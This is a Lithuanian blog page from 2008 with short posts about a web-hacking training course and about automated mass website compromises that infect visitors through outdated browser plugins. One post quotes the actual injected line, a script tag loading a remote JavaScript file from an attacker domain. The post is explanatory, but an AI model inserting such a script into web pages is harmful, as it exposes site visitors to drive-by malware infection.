2008-04-28 15:25 parašė Audrius





(Įvertinimai:
9. Vidutinis balas:
4.11 iš 5 galimų.
Įvertink ir Tu.)

Loading ...
Šiemet organizuoju “WEB HACKING: įveikti internetą” mokymus. Kursui tuoj bus vieneri metai, bet visą tą laiką jis sėkmingai atnaujinamas. Savaitgalį į jį sudėjau ir paskutinio masinio nulaužimo analizę. Įdomiai ta visa ataka padaryta. Pirmą kartą mokymai truko 2 dienas, po to 3, dabar jau neaišku ar į 3 normaliai tilpti pavyks. Bet gal apie viską nuo pradžių.
Skaityti visą įrašą…
» Temos: Apie viską, Gerietis
» Žymėtis:
kaip.tik.ten
::
topix.lt
::
del.icio.us
Įrašo gairės: mokymai www
2008-04-25 00:09 parašė Audrius





(Įvertinimai:
8. Vidutinis balas:
4.88 iš 5 galimų.
Įvertink ir Tu.)

Loading ...
Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus.
Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.

Skaityti visą įrašą…
» Temos: Apie viską, Paieška, Programos
» Žymėtis:
kaip.tik.ten
::
topix.lt
::
del.icio.us
Įrašo gairės: nulaužti valstybiniai puslapiai www
2008-04-18 09:46 parašė Audrius





(Įvertinimai:
8. Vidutinis balas:
4.5 iš 5 galimų.
Įvertink ir Tu.)

Loading ...
Daugiau informacijos adresu: http://www.rdv.lt/lt/apiemus

» Temos: Apie viską
» Žymėtis:
kaip.tik.ten
::
topix.lt
::
del.icio.us
Įrašo gairės: nulaužtas www